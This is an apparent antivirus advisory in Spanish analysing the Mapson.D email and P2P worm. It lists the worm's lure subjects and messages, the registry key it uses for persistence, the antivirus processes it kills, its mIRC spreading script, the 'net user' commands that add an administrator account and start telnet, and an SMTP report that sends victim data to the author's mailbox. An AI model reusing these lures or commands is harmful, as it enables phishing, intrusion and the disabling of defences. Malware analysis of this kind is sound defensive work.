W32/Mapson.D@mm, I.worm.Mapson.D@mm

Mapson.D es un gusano de una compleja y sofisticada programación, reportado inicialmente en España el 02 de Septiembre del 2003, de alta propagación masiva a través de mensajes de correo con Asuntos, Contenidos y archivos Anexados, elegidos en forma aleatoria. 

Se difunde además vía la mayoría de redes Peer to Peer, MSN Messenger, el ICQ, redes con recursos compartidos y el IRC (Internet Chat Relay). Además reporta a su autor información de las infecciones que realiza.

Como en sus versiones anteriores deshabilita antivirus, firewalls y sistemas de control.

Ha sido creado en México por Falckon, miembro del grupo internacional de creadores de virus GEDZAC 2003 y quien ha sido muy productivo en el desarrollo de virus exitosos en los últimos meses. 

El gusano infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003, está desarrollado en Borland Delphi, tiene 180 KB de extensión y comprimido con el utilitario UPX (Ultimate Packer for eXecutables):

http://upx.sourceforge.net

Para auto-enviarse masivamente por correo a todos los buzones de correo de la Libreta de Direcciones de MS Outlook y a la Libreta Global de Windows WAB (Windows Address Book), emplea el componente TNMSMTP de FastNeT Tools para los lenguajes de programación de Borland.

Adicionalmente busca las cuentas de correo del MSN Messenger en las siguientes llaves de registro:

[Software\Microsoft\MessengerService\ListCache\.NET Messenger Service] 
[Software\Microsoft\MSNMessenger\ListCache\.NET Messenger Service] 

Los mensajes tienen las siguientes características:

Remitente, emplea la técnica Email spoofing, que disfraza las verdaderas direcciones de los Remitentes. Asimismo usa las direcciones extraídas del sistema infectado ó alternativamente usa la dirección electrónica virus@viruses.com 

Asunto, cualquiera de los siguientes:

• Alerta por virus Blaster
• Nuevo Mensaje
• Messenger y la Privacidad.
• Roban cuentas de hotmail.
• Huevo Cartoons Gratis :D
• Me gusta..
• Lista de vulnerabilidades en windows
• Esta es mi foto cuando estaba en la playa :).
• Sofia vergara screen saver.
• Nuevo ScreenSaver de Britney Spears.
• Campaña de Seguridad en la red
• Nunca me había visto tan bien
• Problemas de disfunción sexual?...
• 10 pasos para excitar a una mujer
• Herramienta gratuita para eliminar el Blaster
• 10 consejos para tener una buena relación sentimental
• Tu máquina tiene un virus
• Alerta de virus
• Música gratis
• Virus en Hotmail
• Kamasutra
• Su pareja ideal
• Sabes que es el Amor?
• Como consquistar chicas.
• La Biblia del Hacker
• Como crear un virus?
• Nueva vulnerabilidad en Windows
• Hack Mails
• hackers@hackwebmail.com
• es un virus?
• Actualización
• Animaciones
• Posiciones
• confidencial
• divisas.txt
• Si no te interesa..
• as de hotmail
• Ouija Online
• Tienes un E-Mail
• Thalia desnuda!!!
• Foto en alemania
• LatinCards
• 5 consejos para conquistar a una chica
• Fotos de mi chica
• Hackear correos de yahoo hotmail!!!!
• hackear paginas web!!!!
• 5 pasos para hackear hotmail
• New Terminator Screen Saver!
• Shakira Screensaver
• Pics of my Girl
• Blaster Remover
• Matrix Reloaded
• Screen Savers
• New Drivers for windows Update
• Generador de virus! 

Anexado, cualquiera de los siguientes:

• Q832645.exe
• newmail.scr
• privacidad.pif
• cuentashotmail.pif
• www.huevosymashuevos.com
• extreme.pif
• vulnerabildades.pif
• playa_cancun.pif
• avergara.scr
• britney.scr
• www.vsantivirus.com
• engrupo.pif
• disfuncion.pif
• orgasmo.pif
• Anti-Blaster.exe
• pareja.pif
• antirundll.exe
• sharekaza.exe
• nuevovirus.txt.pif
• kamasutra.pif
• parejaideal.pif
• amores.pif
• chicas.pif
• Hacker-Bible.pif
• viruses.pif
• K54403.exe
• microsoft@microsoftupdate.com
• mailcrack.bat
• virus-list.pif
• virus-faq.pif
• animaciones.pif
• posiciones.exe
• confidencial.pif
• readme.pif
• muy-interesante.pif
• confidential-information.pif
• juan@ivan-ich.com
• JuegoconlosMuertos.pif
• sexual-positions.bat
• foto-alemania.pif
• lovecard.bat
• consejos-mujeres.bat
• chica-sex.scr
• hotmailhacker.exe
• hackwebs.exe
• hotmailhack.pif
• generatorviruses.exe
• shakira.scr
• girlpic.pif
• Anti-BlasterWorm.exe
• MatrixReloaded.scr
• Paulina-rubio-cameron-diaz.scr
• Drivers-Windows.exe 

Contenido, uno de los siguientes:

• Epidemia por virus Blaster! este mail es importante no los borres el virus Blaster se a estado reproduciendo con gran capacidad es recomendable usar el parche correctivo para la falla de su windows por favor no espere mas y aplique el parche es por el bienestar de su PC
• Tienes un nuevo correo para verlo haz clic en del adjunto.
• Este documento habla sobre las desventajas de usar el Msn Messenger como mensajero instantáneo cualquier duda se le respondera en el documento.
• Roban cuentas de hotmail. 
  Ultimamente he estado recibiendo muchos correos diciendome provenir de Hotmail pero no... estos correos nos piden nombre de usuario y password pero en realidad es mentira nuestra cuenta sera robada para saber mas lea el adjunto
• Página con una buena colección de huevo cartoons!.
• me gusta y a t
• Esta es una lista de vulnerabilidades en windows para que sepas y no te vayan a hackear cuidate... chau
• Nuevo Screen Saver de sofia vergara desnuda que esperais para bajarlo!
• Nuevo screen saver de britney! :).
• Nueva campaña de seguridad en la red patrocinada por www.vsantivirus.com haga clic en el adjunto para 
  enterarse sobre esto.
• Nunca me había visto tan bien en esta foto.
• Diez ejercicios con los cuales lograra tener una erección 10 veces mejor que la que siempre a tenido
  además de aumentar el tamaño de su pene lealos y no tendra más problemas.
• tengo 10 pasos fáciles a seguir para lograr excitar a una mujer ella lograra tener de 2 a 3 orgasmos
  léalos chau.
• Si usted esta infectado de este peligroso gusano es mejor que utilice la vacuna que le mando
  ejecútela y no tendrá mas problemas.
• 10 simples consejos para tener una buena relación sentimental con su pareja léalos y no tendrá 
  mayores problemas.
• máquina se reinicia a cada rato esto es por un nuevo virus que afecta toda internet 
  para arreglar el problema use el antivirus que le envío
• Cuidado! este virus es peligroso puede formatearte el disco duro llega por hotmail sin que te des cuenta
  tu podrias estar infectado busca en tu sistema el archivo rundll32.exe si lo tienes es mejor que utilizes
  la vacuna que te mando hazlo cuanto antes!! no esperes!!
• Bajate toda la música que tu quieras cuando quieras o como quieras!!!
• Hola se a dado una alerta por parte de las empresas antivirus de un nuevo virus que se expande por hotmail
  hasta el momento indetectable para cualquier producto antiviral por lo que recomiendo leer las precauciones
  sobre este nuevo gusano informatico. Para más información favor de leer el documento informativo.
• Kamasutra el arte del sexo
• Los 10 consejos para tener una pareja ideal 
  Pongalos en practica le aseguro que tendrá resultados satisfactorios.
• que es el amor tampoco lo he sentido pero este texto te ayuda a comprenderlo.
• le doy unos consejos para tener chicas rendidas a sus pies lealos y me dice que tal.
• Excelente libro para aprender a hackear un windows de manera rápida con 10 temas de rápido aprendizaje
  no dejes pasar más tiempo y leelo ya pero no se lo pases a nadie que es solo para ti
• Con este sencillo manual aprenderas a crear virus rápidamente cuidate chau
• El dia de hoy se a descubierto una nueva vulnerabilidad para los sistemas windows recomendamos aplicar el siguiente parche de seguridad ya que el no parchear esta vulnerabilidad puede permitir la ejecución de código en la máquina afectada y podra ser explotada por algún virus como es el caso del Blaster Gracias
• queres verle el mail a un amigo al jefe
  saber si la la novia se mailea con otro entonces usa este programa ;).
• Lista de virus recientes 
  te doy una lista de virus recientes para que estes pendiente y no te vayas a infectar saludos chau
• Disculpa apenas pude enviarte la actualización del programa es que tengo mucho trabajo chau cuidate. 
  update.exe
• Chequea estas divertidas animaciones que te envío 
  ojo no se las des a nadie mas son solo para ti!
• Nuevoo texto que nos informa y nos dice que es un virus como desinfectarse como contrarlos etc.. espero que te guste.
• Para que no te digan y no te cuenten posiciones para hacer el amor chequealas y me dices que tal pero no se las des a nadie mas
• Por favor chequea el adjunto para que sepas de que hablo bye.
• Hola tengo problemas con este archivo serias tan amable de checarlo por mi? 
  gracias adios
• Si esto no te interesa no lo leas.
• La siguiente información no a podido ser enviada
• para ti no se las pases a nadie gracias te cuidas chau.
• Quieres conocer el juego que ha despertado temores y discuciones a lo largo del tiempo mira esto
• Tienes un E-mail para visualizarlo haga clic en el adjunto. 
  el texto no expresa lo que sientes devuelvemelo.
• Recientemente se publicaron unas fotos de la cantante thalia totalmente desnuda!
  he logrado sacar unas y aqui te las mando estan comprimidas 
  por favor no se las des a nadie son solo para ti 
  ! saludos bye.
• Lo he hecho yo y me gustaria que le dieras un vistazo y me dijeras que tal lo vez tu 
  cuidate bye.
• Me he tomado una foto cuando estuve en alemania y me gustaría que le hecharas un vistazo y me dijeras
  como me veo cuidate y adios.
• Le han enviado una LatinCard para poder visualizarla abra el adjuntoGracias.
• Entre estos consejos se encuentran la comunicacion y el respeto si quieres saber mas lee por favor el archivo.
• Aqui tienes unas fotos de mi chica dime si te gustan..
• Acabo de terminar mi nuevo programa para hackear cuentas de correo de yahoo hotmail y latinmail 
  recuerda que es solo para ti por favor no se lo des a nadie mas.
• un programa que hice para hackear paginas web no se lo des a nadie que es solo para tí 
  prometemelo! chau cuidate.
• Oye te doy un texto para hackear hotmail es solo para ti 
  pero no se los des a nadie Prometemelo ok? chau.
• NEW Terminator Screen Saver i hope you will like
• Te paso este programa con el cual puedes crear virus y joder a tus amigos o a tus ENemigos y hasta con la
  opcion de robar los examenes de tu escuela es solo para ti no se lo pases a nadie por favor prometelo 
  genera un virus y me dices como te fue. chau
• Screen Saver de shakira donde sale desnuda :O.
• Here you have the pics of my girl do you like them ?
• this is the new blaster remover... run it as soon as you can
• Cameron Diaz and Paulina rubio naked Screen Saver
• New Drivers for windows Update please update now! 

Al ejecutar el archivo infectado el gusano se copia al directorio raíz como C:\Falckon.vxd y a la carpeta %System% con los siguientes nombres:

• privacidad.pif
• cuentashotmail.pif
• extreme.pif
• vulnerabildades.pif
• playa_cancun.pif
• avergara.scr
• britney.scr
• engrupo.pif
• disfuncion.pif
• orgasmo.pif
• Anti-Blaster.exe
• pareja.pif
• sharekaza.exe
• kamasutra.pif
• parejaideal.pif
• amores.pif
• chicas.pif
• Hacker-Bible.pif
• viruses.pif
• mailcrack.bat
• animaciones.pif
• posiciones.exe
• confidencial.pif
• readme.pif
• muy-interesante.pif
• juan@ivan-ich.com
• JuegoconlosMuertos.pif
• sexual-positions.bat
• foto-alemania.pif
• lovecard.bat
• consejos-mujeres.bat
• chica-sex.scr
• hotmailhacker.exe
• hackwebs.exe
• hotmailhack.pif
• generatorviruses.exe
• shakira.scr
• girlpic.pif
• Anti-BlasterWorm.exe
• MatrixReloaded.scr
• Paulina-rubio-cameron-diaz.scr
• Drivers-Windows.exe
• contraseñas.pif

Para ejecutarse la próxima vez que se inicie el sistema, el gusano crea la siguiente llave de registro:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] 
"NAV" = "%System%\rundll32.exe"

%System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003.

Asimismo, Mapson.D  se copia a las siguientes rutas:

• C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
• C:\Windows\Start Menu\Programs\Startup\
• C:\Windows\Menú inicio\Programas\Inicio\
• C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
• C:\autoexec.bat

Una vez activado, el gusano termina los procesos de los siguientes antivirus, firewalls o programas de monitoreo que se encuentren instalados, dejando al sistema totalmente vulnerable:

• _AVP32.exe
• _AVPCC.exe
• _AVPM.exe
• ADVXDWIN.exe
• AGENTW.EXE
• ALERTSVC.exe
• ALOGSERV.exe
• AMON9X.exe
• ANTI-TROJAN.exe
• APVXDWIN.exe
• ATUPDATER.exe
• ATWATCH.exe
• AUTODOWN.exe
• AVCONSOL.exe
• AVGCC32.exe
• AVGCTRL.exe
• AVGSERV.exe
• AVGSERV9.exe
• AVKPOP.exe
• AVKSERV.exe
• AVKSERVICE.exe
• AVSCHED32.exe
• AVSYNMGR.exe
• AVWINNT.EXE
• AVXMONITOR9X.exe
• AVXMONITORNT.exe
• AVXQUAR.exe
• AVXQUAR.EXE
• BLACKD.exe
• BLACKICE.exe
• CCAPP.EXE
• CCEVTMGR.EXE
• CCPXYSVC.EXE
• ETRUSTCIPE.EXE
• EXPERT.exe
• F-AGNT95.exe
• FAMEH32.exe
• F-PROT.exe
• F-PROT95.exe
• FP-WIN.exe
• FRW ERV.exe
• IOMON98.exe
• NAV AUTO-PROTECT.exe
• NAVAP.EXE
• NAVAPSVC.EXE
• Navapw32.exe
• NAVENGNAVEX15.EXE
• NAVLU32.EXE
• NAVW32.EXE
• NAVWNT.EXE
• NDD32.EXE
• NPSSVC.EXE
• NSCHED32.EXE
• PCCIOMON.EXE
• PCCNTMON.EXE
• PCCWIN97.EXE
• PCCWIN98.EXE
• PCSCAN.EXE
• PERSFW.EXE
• PERSWF.EXE
• POP3TRAP.EXE
• VPTRAY.EXE
• VSCHED.EXE
• AVCONSOL.EXE
• VSECOMR.EXE
• VSHWIN32.EXE
• VSMAIN.EXE
• VSMON.EXE
• VSSTAT.EXE
• ZONEALARM.EXE
• ICLOAD95.EXE
• ICSUPP95.EXE
• ICLOADNT.EXE
• ICSUPPNT.EXE
• Regedit.EXE
• Regedit.com
• msconfig.EXE
• sysedit.EXE
• regedt32.EXE
• NSPCLEAN.exe
• taskmgr.exe
• msblast.exe
• pqremove.exe
• penis32.exe 

Para infectar a través de las redes Peer to Peer, el gusano se auto-copia a las carpetas: 

• \KaZaA\My Shared Folder
• \edonkey2000\incoming
• \gnucleus\downloads
• \icq\shared files
• \kazaa lite\My Shared Folder
• \limewire\shared\
• \morpheus\my shared folder
• \Grokster\My Grokster
• \WinMX\My Shared Folder
• \Tesla\Files
• \Overnet\Incoming
• \XoloX\Downloads
• \Rapigator\Share
• \KMD\My Shared Folder 

Con los siguientes nombres:

• Kazaa Media Desktop.exe
• AOL Instant Messenger.exe
• ICQ ro 2003a beta.exe
• Download Accelerator plus.exe
• ZoneAlarm.exe
• DivX Video Bundle.exe
• RealOne Free Player.exe
• Adobe Acrobat Reader.exe
• JetAudio Basic.exe
• WS_FT.exe
• Registry Mechanic.exe
• MSN Messenger.exe
• Biromsoft WebCam.exe
• Nero Burning ROM.exe
• Microsoft Windows Media Player.exe
• Sybot.exe
• Copernic Agent.exe
• Diet Kazaa.exe
• SolSuite 2003.exe
• pop-Up Stoper.exe
• QuickTime.exe
• XoloX Ultra.exe
• Microsoft Internet Exlorer.exe
• Network Cable e ADSL Speed.exe
• Kazaa Download Accelerator.exe
• Global DiVX layer.exe
• DirectDVD.exe
• Kasersky Antivirus.exe
• PerAntivirus.exe
• Norton Antivirus.exe
• Panda Antivirus.exe
• McAfee Antivirus.exe
• Microsoft Office XP.exe
• Microsoft Windows 2003.exe
• Office 2003.exe
• Visual Studio Net.exe
• Matrix Movie.exe
• Virtual Girl.exe
• FireWorks 4.exe
• FIreWorks MX.exe 

Para difundirse por el IRC (Internet Chat Relay) el gusano modifica el SCRIPT.INI del software mIRC con las siguientes líneas cifradas:

• n0=On 1:JOIN:#:{/if ( $nick == $me) { halt } | .privmsg $nick
• | /dcc Send -c $nick

En Windows NT/2000/XP ó Server 2003, el gusano crea un usuario con privilegios de Administrador con las siguientes instrucciones:

• cmd.exe /c net user GEDZAC gedzac /add
• cmd.exe /c net localgroup "Administrators" GEDZAC /add
• cmd.exe /c net start "telnet" 

Este gusano emplea su propio SMTP (Simple Mail Transfer Protocol) para enviar un correo al autor del virus cada vez que una PC infectada se conecta a Internet, usando las siguientes instrucciones:

smtp.prodigy.net.mx 
Helo localhost 
MAIL FROM: ajh@prodigy.net.mx 
RCPT TO: infectados@virusmex.zzn.com 
FROM: Falckon@GEDZAC.net 
To: infectados@virusmex.zzn.com 
Subject: New Infected 
Mapson.D Reporting to the GEDZAC LABs 
Infection Date: 
Infection Time: 
ICountry: 
Registered Org: 
Reg. Onwer: 
OS: 
IP: 
[GEDZAC LABS] 

Dentro del código del virus se puede leer el siguiente texto:

Los payloads de este gusano son:

• Se propaga masivamente en mensajes de correo, con una variedad de Remitentes falsos (Email Spoofing), Asuntos, Anexados y Contenidos, en forma aleatoria. 
• También usa Remitentes extraídos de la Libreta de Direcciones de MS Outlook, MSN Messenger, etc.
• Ha sido desarrollado en México por Falckon, miembro del grupo de hackers internacionales GEDZAC.
• Infecta a través de la mayoría de redes Peer to Peer.
• Infecta además vía MSN Messenger, canales de Chat, ICQ y redes con recursos compartidos.
• Usando su propio SMTP envía a su autor información de los sistemas que logra infectar.
• Intenta saturar Servidores de Correo, estaciones de trabajo y PC domésticas.

PER ANTIVIRUS® versión 8.2 con registro de virus al 02 de Septiembre del 2003 detecta y elimina eficientemente este gusano.

Nota: existe una diferencia de 7 horas entre Perú (-5 GMT) y España (+2 GMT)